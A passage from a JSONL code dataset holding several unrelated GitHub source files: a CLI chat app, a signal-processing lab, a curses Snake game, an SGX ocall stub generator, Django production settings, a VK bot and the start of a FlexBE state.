cli_chat.bot import Bot\nfrom cli_chat.console import Console\nfrom cli_chat.command import CommandManager\n\nfrom appdirs import user_config_dir\nfrom typer import Typer, Argument, Option\n\n\ndef read_key(key_path: Path, console: Console):\n if not key_path.exists():\n console.info(\"No OpenAI key found. Please go to https://beta.openai.com/account/api-keys to get one.\")\n update_key()\n\n with key_path.open() as f:\n return f.read().strip()\n\n\napp = Typer(add_completion=False)\nconfig_app = Typer(add_completion=False, no_args_is_help=True)\nconfig_dir = Path(user_config_dir(\"cli_chat\"))\nconsole = Console(history_dir=config_dir / \"history\")\n\n\n@app.callback(invoke_without_command=True)\ndef main(\n model: str = Option(\"gpt-3.5-turbo\", \"--model\", \"-m\", help=\"The model to use.\", prompt=True),\n):\n api_key = read_key(config_dir / \"key\", console)\n Bot(openai_api_key=api_key,\n console=console,\n command_manager=CommandManager(),\n model=model\n )()\n\n\n@config_app.command(help=\"Update the OpenAI key.\")\ndef update_key():\n api_key = console.prompt(\n \"Please key in a valid OpenAI Key: \",\n is_password=True,\n )\n with (config_dir / \"key\").open(\"w\") as f:\n f.write(api_key)\n console.info(\"Key updated.\")\n\n\n@config_app.command(help=\"Remove the OpenAI key.\")\ndef remove_key(\n):\n if (config_dir / \"key\").exists():\n (config_dir / \"key\").unlink()\n console.info(\"Key removed.\")\n else:\n console.error(\"No key found.\")\n\n\n@config_app.command(help=\"Clear the input history.\")\ndef clear_history():\n shutil.rmtree(config_dir / \"history\")\n console.info(\"History cleared.\")\n","repo_name":"Tefx/cli-chat","sub_path":"cli_chat/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"53"} +{"seq_id":"1025292088","text":"# Luana Strimbeanu Grupa 343\n\n# 1\nfs = 44.1 # kHz\nfs *= 1000 # Hz\nbindist = 1 # Hz\n# bindist = fs/N\nN = fs / bindist\n\nprint(N)\n\n# 2\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef rectangle(dim):\n return 1\n\n\ndef hanning(dim):\n return 0.5 * (1 - np.cos(2 * np.pi * dim / Nw))\n\n\n# a\nNw = 200\nfs = 100\nt = np.linspace(0, 1, num=Nw)\nx = np.sin(2 * np.pi * fs * t)\n\nxwr = []\nfor i in range(Nw):\n xwr.append(x[i] * rectangle(i))\n\nxwhn = []\nfor i in range(Nw):\n xwhn.append(x[i] * hanning(i))\n\n# plt.plot(xwr)\n# plt.plot(xwhn)\n# plt.show()\n\n# b\n\nf1 = 1000 # Hz\nf2 = 1100 # Hz\nfs = 8000 # Hz\nNw = 1000\n\nt = np.linspace(0, Nw, num=fs)\nx1 = np.sin(2 * np.pi * f1 * t)\nx2 = np.sin(2 * np.pi * f2 * t)\n\nxwr1 = []\nfor i in range(Nw):\n xwr1.append(x1[i] * rectangle(i))\n\nxwr2 = []\nfor i in range(Nw):\n xwr2.append(x2[i] * rectangle(i))\n\n# plt.plot(xwr1)\n# plt.plot(xwr2)\n# plt.show()\n\n# sinusoida ce utilizeaza cea de-a 2a frecventa are\n# o probabilitate mai mare sa prinda mai multe semnale\n\n# 3\n\n# a\n\nnsamples = 3 * 24 # (3 zile x 24h)\nf = open('trafic.csv')\n\ncnt = 1\nsamples = []\n\nfor lin in f:\n if cnt > nsamples:\n break\n else:\n # primul sample apare ciudat for some reason\n if cnt != 1:\n samples.append(int(lin.strip()))\n cnt += 1\n\n# b\n\navg = []\nfor windowsize in [5, 9, 13, 17]:\n average = np.convolve(samples, np.ones(windowsize) / windowsize, 'valid') # rezultatele mediei mobile\n avg.append(average)\n plt.plot(average)\n\nplt.show()\n\n\n\n","repo_name":"st-lu/University","sub_path":"Signal Processing/lab4.py","file_name":"lab4.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"13465611455","text":"import curses\r\nfrom curses import textpad\r\nfrom random import randint\r\nimport csv\r\n#Estructuras Importadas\r\nimport CircularDobleEnlazada\r\nimport Pila\r\nimport Cola\r\nimport EnlazadaDoble\r\n\r\nmenu = ['1. Jugar', '2. Tabla de Punteo', '3. Selección Usuario', '4. Reportes', '5. Carga Masiva']\r\nreportes = ['1. Punteos', '2. Usuarios']\r\n# Estructuras\r\nuserScoreReport = Cola.Cola()\r\nusuarios = CircularDobleEnlazada.CDEnlazada()\r\n## Aqui funcionará el juego\r\ndef pintarJuego(stdscr, nombreUsuario):\r\n if nombreUsuario is \"\":\r\n registrarUsuario(stdscr)\r\n else:\r\n serpiente = EnlazadaDoble.listaDE()\r\n score = Pila.Pila()\r\n stdscr.clear()\r\n velocidad = 150\r\n punteo = 0\r\n nivel = 1\r\n #Punteo de cambio de nivel\r\n pt = 5\r\n quitar = 50\r\n stdscr.timeout(velocidad)\r\n alto, ancho = stdscr.getmaxyx()\r\n stdscr.addstr(1 , 1 ,\"Puntaje = \" + str(punteo))\r\n stdscr.addstr(1 , ancho//2,\"Nivel = \" + str(nivel))\r\n stdscr.addstr(1 , ancho - len(\"Usuario\"),\"Usuario = \" + str(nombreUsuario))\r\n randomY = randint(3,alto-3)\r\n randomX = randint(3,ancho - 4)\r\n comidita = \"+\"\r\n stdscr.addstr(randomY, randomX, comidita)\r\n stdscr.border(0)\r\n textpad.rectangle(stdscr, 2, 2, alto - 2, ancho - 3)\r\n # Inserto el cuerpo inicial de la serpiente\r\n serpiente.insertar(alto//2, ancho//2 - 1)\r\n serpiente.insertar(alto//2, ancho//2)\r\n serpiente.insertar(alto//2, ancho//2 + 1)\r\n # Fin creación de serpiente\r\n # temporal para recorrer la serpiente y dibujar sus coordenadas\r\n temporalSerpiente = serpiente.ancla\r\n key = 452\r\n keyAnterior = key\r\n direccion = curses.KEY_LEFT\r\n while temporalSerpiente.siguiente is not None:\r\n temporalSerpiente = temporalSerpiente.siguiente\r\n stdscr.addstr(int(str(temporalSerpiente.cY)), int(str(temporalSerpiente.cX)), \"#\")\r\n stdscr.refresh()\r\n # Bucle del Juego\r\n colision_sinComida = False\r\n Pausa = False\r\n while True:\r\n if punteo == pt and velocidad > 25 and nivel < 3:\r\n nivel += 1\r\n pt = pt + 5\r\n velocidad = velocidad - quitar\r\n quitar += 40\r\n stdscr.timeout(velocidad)\r\n temporal = serpiente.ancla.siguiente\r\n tempCX = 0\r\n tempCY = 0\r\n\r\n if key > 0:\r\n keyAnterior = key\r\n \r\n key = stdscr.getch()\r\n #He creado esta restricción, ya que no se me ocurre como voltear a la serpiente\r\n # cuando esta sea muy larga y tenga muchos dobleces\r\n if key in [curses.KEY_UP, 450] and (keyAnterior in [curses.KEY_DOWN, 456]):\r\n key = keyAnterior\r\n elif key in [curses.KEY_DOWN, 456] and keyAnterior in [curses.KEY_UP, 450]:\r\n key = keyAnterior\r\n elif key in [curses.KEY_LEFT, 452] and keyAnterior in [curses.KEY_RIGHT, 454]:\r\n key = keyAnterior\r\n elif key in [curses.KEY_RIGHT, 454] and keyAnterior in [curses.KEY_LEFT, 452]:\r\n key = keyAnterior\r\n\r\n stdscr.clear()\r\n if key in [curses.KEY_UP, curses.KEY_DOWN, curses.KEY_LEFT, curses.KEY_RIGHT] or key in [450, 456, 452, 454]:\r\n direccion = key\r\n elif key in [curses.KEY_ABORT, 27]:\r\n #Boton de Pausa\r\n if Pausa is False:\r\n Pausa = True\r\n else:\r\n Pausa = False\r\n \r\n if temporal.cX == randomX and temporal.cY == randomY:\r\n ## Agrego los valores a la pila para el score result\r\n score.push(randomX, randomY)\r\n ## Luego creo el reporte del mismo\r\n score.graficar()\r\n #################################\r\n if comidita is \"+\":\r\n serpiente.insertar(0,0)\r\n colision_sinComida = False\r\n punteo += 1\r\n elif comidita is \"*\":\r\n serpiente.eliminar()\r\n colision_sinComida = False\r\n serpiente.actualizar(temporal.cX,temporal.cY)\r\n if punteo > 0:\r\n punteo -= 1\r\n #################################\r\n randomX = randint(3, ancho - 4)\r\n randomY = randint(3, alto - 3)\r\n crecer_o_disminuir = randint(0,10)\r\n\r\n if crecer_o_disminuir >= 0 and crecer_o_disminuir <= 6:\r\n comidita = \"+\"\r\n stdscr.addstr(randomY, randomX, comidita)\r\n else:\r\n comidita = \"*\"\r\n stdscr.addstr(randomY, randomX, comidita)\r\n else:\r\n stdscr.addstr(randomY, randomX, comidita)\r\n \r\n if Pausa is False:\r\n if direccion in [curses.KEY_UP, 450]:\r\n # Lo que haré aquí será atravesar la pared\r\n # por medio de la cabeza del snake\r\n if temporal.cY <= 3:\r\n temporal.cY = alto-3\r\n else:\r\n tempCX = temporal.cX\r\n tempCY = temporal.cY\r\n temporal.cY -= 1\r\n elif direccion in [curses.KEY_DOWN, 456]:\r\n if temporal.cY >= alto - 3:\r\n temporal.cY = 3\r\n else:\r\n tempCX = temporal.cX\r\n tempCY = temporal.cY\r\n temporal.cY += 1 \r\n elif direccion in [curses.KEY_LEFT, 452]:\r\n if temporal.cX <= 3:\r\n temporal.cX = ancho - 4\r\n else:\r\n tempCX = temporal.cX\r\n tempCY = temporal.cY\r\n temporal.cX -= 1\r\n elif direccion in [curses.KEY_RIGHT, 454]:\r\n if temporal.cX >= ancho - 4:\r\n temporal.cX = 3\r\n else:\r\n tempCX = temporal.cX\r\n tempCY = temporal.cY\r\n temporal.cX += 1\r\n serpiente.actualizar(tempCX,tempCY)\r\n \r\n if colision_sinComida == False:\r\n alto, ancho = stdscr.getmaxyx()\r\n stdscr.addstr(1,25 - len(\"Puntaje\"),\"Puntaje = \" + str(punteo))\r\n stdscr.addstr(1,50 - len(\"Nivel\"),\"Nivel = \" + str(nivel))\r\n stdscr.addstr(1,75 - len(\"Usuario\"),\"Usuario = \" + str(nombreUsuario))\r\n stdscr.border(0)\r\n textpad.rectangle(stdscr, 2, 2, alto - 2, ancho - 3)\r\n while temporal is not None:\r\n stdscr.addstr(int(str(temporal.cY)), int(str(temporal.cX)), str(temporal.char))\r\n temporal = temporal.siguiente\r\n stdscr.refresh()\r\n colision_sinComida = serpiente.colision(True)\r\n else:\r\n serpiente.generarReporte()\r\n userScoreReport.push(nombreUsuario,punteo)\r\n serpiente.cantidad = 0\r\n punteo = 0\r\n serpiente.vaciarSerpiente()\r\n stdscr.clear()\r\n stdscr.timeout(-1)\r\n alto, ancho = stdscr.getmaxyx()\r\n stdscr.addstr(alto//2, ancho//2 - len(\"GAME OVER\"), \"GAME OVER\")\r\n stdscr.addstr(alto//2 + 1, ancho//2 - len(\"Presiona una tecla para continuar...\"), \"Presiona una tecla para continuar...\")\r\n stdscr.refresh()\r\n stdscr.getch()\r\n break\r\n else:\r\n serpiente.generarReporte()\r\n stdscr.clear()\r\n stdscr.addstr(alto//2,ancho//2 - len(\"PAUSA\"),\"PAUSA\")\r\n stdscr.refresh()\r\n## Mostraremos el Score actual en tabla\r\ndef mostrarTablaPuntaje(stdscr):\r\n stdscr.clear()\r\n stdscr.border(0)\r\n alto, ancho = stdscr.getmaxyx()\r\n temporal = userScoreReport\r\n temporalito = userScoreReport.ancla\r\n if temporal.numeroPunteos > 0:\r\n y = 5\r\n stdscr.addstr(y, ancho//4, \"Nombre\")\r\n stdscr.addstr(y, ancho//2, \"Punteo\")\r\n while temporalito.siguiente is not None:\r\n y = y + 1\r\n temporalito = temporalito.siguiente\r\n stdscr.addstr(y, ancho//4, temporalito.nombre)\r\n stdscr.addstr(y, ancho//2, str(temporalito.puntuacion))\r\n else:\r\n stdscr.addstr(alto//2, ancho//2 - len(\"NO HAY PUNTEOS QUE MOSTRAR\"), \"NO HAY PUNTEOS QUE MOSTRAR\")\r\n stdscr.refresh()\r\n stdscr.getch()\r\n## Será el apartado para dibujar el menú inicial\r\ndef pintarMenuInicial(stdscr, opcionElegida):\r\n # despinto la pantalla\r\n stdscr.clear()\r\n # Obtenemos el tamaño máximo de la pantalla\r\n alto, ancho = stdscr.getmaxyx()\r\n for index, fila in enumerate(menu):\r\n x = ancho//2 - 20\r\n y = alto//2 - len(menu)//2 + index\r\n if(opcionElegida == index):\r\n stdscr.attron(curses.color_pair(1))\r\n stdscr.addstr(y,x,fila)\r\n stdscr.attroff(curses.color_pair(1))\r\n else:\r\n stdscr.addstr(y,x,fila)\r\n stdscr.addstr(1,1,\"ESC Salir\")\r\n stdscr.refresh()\r\ndef pintarMenuReportes(stdscr, opcionElegida):\r\n # despinto la pantalla\r\n stdscr.clear()\r\n # Obtenemos el tamaño máximo de la pantalla\r\n alto, ancho = stdscr.getmaxyx()\r\n for index, fila in enumerate(reportes):\r\n x = ancho//2 - 20\r\n y = alto//2 - len(reportes)//2 + index\r\n if(opcionElegida == index):\r\n stdscr.attron(curses.color_pair(1))\r\n stdscr.addstr(y,x,fila)\r\n stdscr.attroff(curses.color_pair(1))\r\n else:\r\n stdscr.addstr(y,x,fila)\r\n stdscr.addstr(2,2,\"ESC Salir\")\r\n stdscr.addstr(alto//2 - 5, ancho//2 - len(\"REPORTES\"), \"REPORTES\")\r\n stdscr.refresh()\r\n## Pintar menu de repotes\r\ndef menuReportes(stdscr):\r\n stdscr.border(0)\r\n curses.init_pair(1, curses.COLOR_BLACK, curses.COLOR_WHITE)\r\n opcion = 0\r\n pintarMenuReportes(stdscr, opcion)\r\n while True:\r\n tecla = stdscr.getch()\r\n if tecla == 450 or tecla == curses.KEY_UP and opcion > 0:\r\n opcion -= 1\r\n elif tecla == 456 or tecla == curses.KEY_DOWN and opcion < len(reportes) - 1:\r\n opcion += 1\r\n elif tecla == 10 or tecla == curses.KEY_ENTER:\r\n ## Limpiaremos primero la pantalla para mostrar el siguiente\r\n stdscr.clear()\r\n ## Aqui reconocemos que el usuario ha pulsado enter\r\n # Por lo tanto veremos en que \"opcion\" hizo enter\r\n if opcion is 0:\r\n # Mostraremos el juego como tal\r\n userScoreReport.graficar()\r\n elif opcion is 1:\r\n # Mostraremos la tabla de puntaje\r\n usuarios.graficar()\r\n elif tecla == 27 or tecla == curses.KEY_ABORT:\r\n # Si el usuario pulsa ESC en el menu inicial, se saldrá del programa\r\n break\r\n pintarMenuReportes(stdscr, opcion)\r\n# Ingreso de archivo .csv\r\ndef llenadoMasivo(stdscr):\r\n stdscr.clear()\r\n stdscr.addstr(1,1, \"ESC - Salir\")\r\n stdscr.addstr(2,1,\"Carga Masiva _ Archivos CSV\")\r\n stdscr.addstr(3,1,\"Funcionamiento:\")\r\n stdscr.addstr(4,1,\"Coloca el archivo .csv en la carpeta del juego\")\r\n stdscr.addstr(5,1,\"Escribe el nombre del archivo:\")\r\n cadenaTexto = \"\"\r\n while True:\r\n tecla = stdscr.getkey()\r\n stdscr.clear()\r\n if tecla is \"\\n\":\r\n try:\r\n i = 0\r\n nNombre = 1\r\n archivo = open(cadenaTexto, \"r\", newline=\"\")\r\n for linea in archivo:\r\n dato = linea.split(\",\\r\\n\")\r\n dato.append(dato)\r\n for nombre in dato:\r\n if i%3 == 0 and nNombre is not 1:\r\n usuarios.ingresar(nombre)\r\n i = i + 1\r\n nNombre = nNombre + 1\r\n break\r\n except Exception:\r\n stdscr.attron(curses.color_pair(1))\r\n stdscr.addstr(0,1,\"Ha ocurrido un error, intentalo nuevamente :/\")\r\n stdscr.attroff(curses.color_pair(1))\r\n elif tecla is \"\\x08\":\r\n cadenaTexto = cadenaTexto[0:len(cadenaTexto) - 1]\r\n elif tecla is \"\\x1b\":\r\n break\r\n else:\r\n cadenaTexto = cadenaTexto + tecla\r\n stdscr.addstr(1,1, \"ESC - Salir\")\r\n stdscr.addstr(2,1,\"Carga Masiva _ Archivos CSV\")\r\n stdscr.addstr(3,1,\"Funcionamiento:\")\r\n stdscr.addstr(4,1,\"Coloca el archivo .csv en la carpeta del juego\")\r\n stdscr.addstr(5,1,\"Escribe el nombre del archivo:\")\r\n stdscr.addstr(6,1,cadenaTexto)\r\n stdscr.refresh()\r\n## Servirá para elegir el personaje en el menú seleccionado\r\ndef elegirPersonaje(stdscr):\r\n #Contamos el numero de jugadores registrados\r\n numero = usuarios.cantidad()\r\n if numero > 0:\r\n # Hay jugadores, muestro el siguiente menu\r\n stdscr.clear()\r\n alto, ancho = stdscr.getmaxyx()\r\n x = ancho//2 - len(\"Elige tu Nombre\")\r\n y = alto//2 - 2\r\n stdscr.addstr(1,1,\"ESC Salir\")\r\n stdscr.addstr(y,x,\"Elige tu Nombre\")\r\n stdscr.addstr(y + 1,x - len(usuarios.ancla.siguiente.nombre),\"<-- \" + usuarios.ancla.siguiente.nombre + \" -->\")\r\n # While para que sea mientras presione un boton\r\n while True:\r\n tecla = stdscr.getch()\r\n stdscr.clear()\r\n if tecla == curses.KEY_LEFT or tecla == 452 or tecla == curses.KEY_UP or tecla == 450:\r\n # Pediré el usuario que está a la izquierda o sea al anterior del actual y lo mostraré en pantalla\r\n nombreJugador = usuarios.jugador(\"L\")\r\n elif tecla == curses.KEY_RIGHT or tecla == 454 or tecla == curses.KEY_DOWN or tecla == 456:\r\n # Pediré el usuario que está a la derecha o siguiente del actual\r\n nombreJugador = usuarios.jugador(\"R\")\r\n elif tecla == 10 or tecla == curses.KEY_ENTER:\r\n # El usuario ha tecleado el Enter, entonces ha seleccionado un jugador\r\n # el juego empieza con el nombre del jugador seleccionado\r\n pintarJuego(stdscr, nombreJugador)\r\n break\r\n elif tecla == 27 or tecla == curses.KEY_ABORT:\r\n # Al usuario que pulse ESC se le mostrará el menu de inicio.\r\n break\r\n # Muestro el nombre de manera mucho más corta\r\n stdscr.addstr(1,1,\"ESC Salir\")\r\n stdscr.addstr(y,x,\"Elige tu Nombre\")\r\n xnomJug = ancho//2 - len(\"Elige tu Nombre\")\r\n ynomJug = alto//2\r\n stdscr.addstr(ynomJug, xnomJug,\"<-- \"+ nombreJugador +\" -->\")\r\n stdscr.refresh()\r\n else:\r\n #No hay jugadores, muestro el menu de registro\r\n registrarUsuario(stdscr)\r\n\r\n\r\n # Menu para registrar un usuario\r\ndef registrarUsuario(stdscr):\r\n stdscr.clear()\r\n alto, ancho = stdscr.getmaxyx()\r\n x = ancho//2 - len(\"Ingresa tu Nombre:\")\r\n y = alto//2\r\n stdscr.addstr(1,1,\"ESC Salir\")\r\n stdscr.addstr(y, x, \"Ingresa tu Nombre:\")\r\n nombreIngresado = \"\"\r\n # un While para pedir los caracteres del nombre\r\n while True:\r\n tecla = stdscr.getkey()\r\n if tecla is \"\\x08\":\r\n nombreIngresado = nombreIngresado[0:len(nombreIngresado) - 1]\r\n if tecla is \"\\n\":\r\n ## Vamos a registrar el nombre ingresado por el usuario\r\n usuarios.ingresar(nombreIngresado)\r\n pintarJuego(stdscr, nombreIngresado)\r\n break\r\n elif tecla is \"\\x1b\":\r\n break\r\n else:\r\n stdscr.clear()\r\n # Voy a mostrar un mensaje que me pida el nombre\r\n stdscr.addstr(y, x, \"Ingresa tu Nombre:\")\r\n nombreIngresado += tecla\r\n xnom = ancho//2 - len(\"Ingresa tu Nombre:\")\r\n ynom = alto//2 + 2\r\n stdscr.addstr(ynom,xnom,nombreIngresado)\r\n stdscr.refresh()\r\n## Inicio de juego de verdad\r\n## Primero comenzaré con el diseño del Menú Inicial\r\ndef menuInicial(stdscr):\r\n stdscr = curses.initscr()\r\n curses.curs_set(0)\r\n curses.init_pair(1, curses.COLOR_BLACK, curses.COLOR_WHITE)\r\n opcion = 0\r\n ## Pintaremos el menú para mostrarlo xd\r\n pintarMenuInicial(stdscr, opcion)\r\n while True:\r\n ## Pediremos al Usuario una opcion dependiendo de la tecla\r\n tecla = stdscr.getch()\r\n # Limpiaremos la pantalla de consola\r\n stdscr.clear()\r\n ## Ahora verificamos que tecla pulso el usuario\r\n if tecla == 450 or tecla == curses.KEY_UP and opcion > 0:\r\n opcion -= 1\r\n elif tecla == 456 or tecla == curses.KEY_DOWN and opcion < len(menu) - 1:\r\n opcion += 1\r\n elif tecla == 10 or tecla == curses.KEY_ENTER:\r\n ## Limpiaremos primero la pantalla para mostrar el siguiente\r\n stdscr.clear()\r\n ## Aqui reconocemos que el usuario ha pulsado enter\r\n # Por lo tanto veremos en que \"opcion\" hizo enter\r\n if opcion is 0:\r\n # Mostraremos el juego como tal\r\n pintarJuego(stdscr, \"\")\r\n elif opcion is 1:\r\n # Mostraremos la tabla de puntaje\r\n mostrarTablaPuntaje(stdscr)\r\n elif opcion is 2:\r\n # Mostraremos el menú para elegir \"personaje\"\r\n elegirPersonaje(stdscr)\r\n elif opcion is 3:\r\n # Mostraremos el menú para los reportes\r\n menuReportes(stdscr)\r\n elif opcion is 4:\r\n # Mostraremos el menú para el llenado masivo\r\n llenadoMasivo(stdscr)\r\n elif tecla == 27 or tecla == curses.KEY_ABORT:\r\n # Si el usuario pulsa ESC en el menu inicial, se saldrá del programa\r\n break\r\n pintarMenuInicial(stdscr, opcion)\r\ncurses.wrapper(menuInicial)","repo_name":"Ricardo16X/EDD_2S2019_P1_201700524","sub_path":"SNAKE/snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":18413,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30186627139","text":"#!/usr/bin/python\n\nocalls = [\n 'clock',\n 'time',\n 'localtime',\n 'gmtime',\n 'mktime',\n 'gettimeofday',\n 'puts',\n 'push_gadget',\n 'open',\n 'close',\n 'read',\n 'write',\n 'lseek',\n 'socket',\n 'bind',\n 'connect',\n 'listen',\n 'accept',\n 'fstat',\n 'send',\n 'recv',\n 'sendto',\n 'recvfrom',\n 'gethostname',\n 'getaddrinfo',\n 'getenv',\n 'getsockname',\n 'getsockopt',\n 'getservbyname',\n 'getprotobynumber',\n 'setsockopt',\n 'htons',\n 'htonl',\n 'ntohs',\n 'ntohl',\n 'signal',\n 'shutdown',\n]\n\nalign = 5\nmsg = 'this file is generated by lib/gen_ocall_stub.py script\\n'\n\nmakefile = open('ocall.mk', 'w')\nmakefile.write('# ' + msg)\nmakefile.write('OCALL_OBJS = \\\\\\n')\nocalltab = open('ocall_table.cpp', 'w')\nocalltab.write('// ' + msg)\nocalltab.write('static void *ocall_table[' + str(len(ocalls)) + '] = {\\n')\ni = 0\nfor o in ocalls:\n makefile.write('\\t$(OCALL_OBJS_DIR)' + o + '.o \\\\\\n')\n ocalltab.write(' (void *) sgx_' + o + ',\\n')\n asm = open(o + '.s', 'w')\n asm.write('# ' + msg)\n asm.write('.text\\n')\n asm.write('.global ' + o + '\\n')\n asm.write('.type %s, @function\\n' % o)\n asm.write('.p2align %d\\n' % align)\n asm.write(o + ':\\n')\n asm.write(' mov $' + str(i) + ', %r15\\n')\n asm.write(' jmp sgx_ocall\\n')\n asm.close()\n i = i + 1\n\nocalltab.write('};\\n\\n')\ndo_sgx_ocall = \\\n'// TODO: check if it breaks the calling ABI\\n\\\nvoid do_sgx_ocall() {\\n\\\n __asm__ __volatile__ (\\n\\\n \"mov (%0, %%r15, 8), %%r15\\\\n\"\\n\\\n \"call *%%r15\\\\n\"\\n\\\n ::\"r\" (ocall_table));\\n\\\n}\\n'\nocalltab.write(do_sgx_ocall)\nocalltab.close()\n\nmakefile.close()\n","repo_name":"jaebaek/SGX-Shield","sub_path":"program/lib/gen_ocall_stub.py","file_name":"gen_ocall_stub.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"53"} +{"seq_id":"2073383448","text":"import sys\nfrom contest_utils import leer_participantes, crear_diccionario_capitan;\nfrom investment_counting import obtener_cantidad_inversiones;\n\ndef main():\n if len(sys.argv) != 3:\n print(\"Uso: python contest.py participantes.txt 4\")\n return\n\n archivo_participantes = sys.argv[1]\n pos_capitan = sys.argv[2]\n participantes, capitan = leer_participantes(archivo_participantes, pos_capitan)\n \n if capitan is None:\n print(\"Número de capitán inválido\")\n return\n \n categorias_capitan = crear_diccionario_capitan(capitan['categorias'])\n \n nombre_companiero = \"\"\n max_inversiones = -1\n \n for un_participante in participantes:\n inversiones_participantes = obtener_cantidad_inversiones(un_participante[1], categorias_capitan)\n if inversiones_participantes > max_inversiones:\n max_inversiones = inversiones_participantes\n nombre_companiero = un_participante[0]\n \n print(f\"{capitan['nombre']}, {nombre_companiero}\")\n \nif __name__ == \"__main__\":\n main()","repo_name":"FrancoSecchi/tda","sub_path":"tp1/contest/contest.py","file_name":"contest.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28698858118","text":"from .settings import *\n\n\nSECRET_KEY = os.environ.get(\"SECRET_KEY\")\nDEBUG = int(os.environ.get(\"DEBUG\", default=0))\nALLOWED_HOSTS = os.environ.get(\"DJANGO_ALLOWED_HOSTS\").split(\" \")\n\nCONN_MAX_AGE = 300\n\nDATABASES = {\n \"default\": {\n \"ENGINE\": os.environ.get(\"SQL_ENGINE\", \"django.db.backends.sqlite3\"),\n \"NAME\": os.environ.get(\"SQL_DATABASE\", os.path.join(BASE_DIR, \"db.sqlite3\")),\n \"USER\": os.environ.get(\"SQL_USER\", \"user\"),\n \"PASSWORD\": os.environ.get(\"SQL_PASSWORD\", \"password\"),\n \"HOST\": os.environ.get(\"SQL_HOST\", \"localhost\"),\n \"PORT\": os.environ.get(\"SQL_PORT\", \"5432\"),\n }\n}\n\nREDIS_SERVER_NAME = os.environ.get(\"REDIS_SERVER_NAME\",default=\"redis\")\n\nKAVENEGAR_TOKEN = os.environ[\"KAVENEGAR_TOKEN\"]\n\nSIMPLE_JWT = {\n 'ACCESS_TOKEN_LIFETIME':timedelta(days=60),\n 'REFRESH_TOKEN_LIFETIME':timedelta(days=61)\n }\n\n\nAWS_ACCESS_KEY_ID = os.environ.get(\"STORAGE_ACCESS_KEY_ID\")\nAWS_SECRET_ACCESS_KEY = os.environ.get(\"STORAGE_SECRET_ACCESS_KEY\")\nAWS_STORAGE_BUCKET_NAME = os.environ.get(\"STORAGE_BUCKET_NAME\")\nAWS_S3_ENDPOINT_URL = f\"https://s3.ir-thr-at1.arvanstorage.com\"\nAWS_S3_OBJECT_PARAMETERS = {\n 'CacheControl':'max-age=86400'\n}\n\nAWS_LOCATION = \"static\"\n\n# STATICFILES_DIRS = [\n# os.path.join(BASE_DIR, 'static'),\n# ]\n\nSTATIC_URL = 'https://{AWS_S3_CUSTOM_DOMAIN}/{AWS_LOCATION}/'\nSTATICFILES_STORAGE = 'storages.backends.s3boto3.S3Boto3Storage'\nAWS_S3_FILE_OVERWRITE = False\nDEFAULT_FILE_STORAGE = \"netproject.storage_backends.MediaStorage\"\n\nCELERY_BROKER_URL=\"amqp://{}:{}\".format(os.environ.get(\"RABBITMQ_HOST\"), os.environ.get(\"RABBITMQ_PORT\", 5672))\n","repo_name":"devprofile98/netlabproject","sub_path":"netproject/prod-settings.py","file_name":"prod-settings.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28041930596","text":"import bs4\nimport requests\nimport vk_api\nfrom vk_api.longpoll import VkLongPoll, VkEventType\n\n\nclass VkBot:\n \"\"\"Класс бота. Содержит сбор id пользователя, его имени, а также простейшие команды самого бота, требующиеся\n для приветствия и прощания.\"\"\"\n\n # __init__ - публичный метод; self - ссылается на сам объект\n def __init__(self, user_id):\n # Здесь хранится юзер id\n self._USER_ID = user_id\n # Здесь хранится имя пользователя для обращения в сообщениях\n self._USERNAME = self._get_user_name_from_vk_id(user_id)\n # Простейшие первичные команды\n self._COMMANDS = [\"привет\",\n \"ghbdtn\",\n \"пока\"]\n\n def _get_user_name_from_vk_id(self, user_id):\n \"\"\"Метод получает имя пользователя через его id\"\"\"\n # Запрашиваем id юзера\n request = requests.get(\"https://vk.com/id\" + str(user_id))\n # парсим\n soup = bs4.BeautifulSoup(request.text, \"html.parser\")\n user_name = self._clean_all_tag_from_str(soup.findAll(\"title\")[0])\n # Возвращаем имя пользователя\n return user_name.split()[0]\n\n def read_command_file(self):\n \"\"\"Метод читает файл с командами бота и вовращает их\"\"\"\n # Читаем файл, в котором находятся все команды бота\n commandsFile = open(\"commands.txt\")\n return commandsFile.read()\n\n def new_message(self, message):\n \"\"\"Метод обрабатывает сообщения пользователя и возвращает ответ\"\"\"\n # Приветствие. Текст сообщения опускаем в нижний регистр, чтобы не быть к нему чувствительными\n if message.lower() == self._COMMANDS[0]:\n return f\"Привет, {self._USERNAME}! Я - Зодиакус - твой проводник в мир толкования звёзд.\\n \" \\\n f\"Вот список моих команд:\\n\" + self.read_command_file()\n # Раскладка клавиатуры\n elif message.lower() == self._COMMANDS[1]:\n return f\"Для общения поменяй раскладку клавиатуры - я понимаю только русский 😜\"\n # Прощание\n elif message.lower() == self._COMMANDS[2]:\n return f\"Пока-пока, {self._USERNAME}!\"\n else:\n return f\"Я ничего не понял... Напиши команду ещё раз.\\n\" \\\n f\"Введи команды, чтобы посмотреть их список.\"\n\n # Метод для очистки от ненужных тэгов\n @staticmethod\n def _clean_all_tag_from_str(string_line):\n \"\"\"\n Очистка строки stringLine от тэгов и их содержимых\n :param string_line: Очищаемая строка\n :return: очищенная строка\n \"\"\"\n result = \"\"\n not_skip = True\n for i in list(string_line):\n if not_skip:\n if i == \"<\":\n not_skip = False\n else:\n result += i\n else:\n if i == \">\":\n not_skip = True\n\n return result\n","repo_name":"KateBashkirova/ZodiacusBot","sub_path":"zodiacusBrains.py","file_name":"zodiacusBrains.py","file_ext":"py","file_size_in_byte":3728,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43135307979","text":"#!/usr/bin/env python \n#-*- coding: utf-8 -*-\n\nfrom time import time\nimport rospy\n\nfrom flexbe_core import EventState, Logger\nfrom geometry_msgs.msg import Pose, Point, 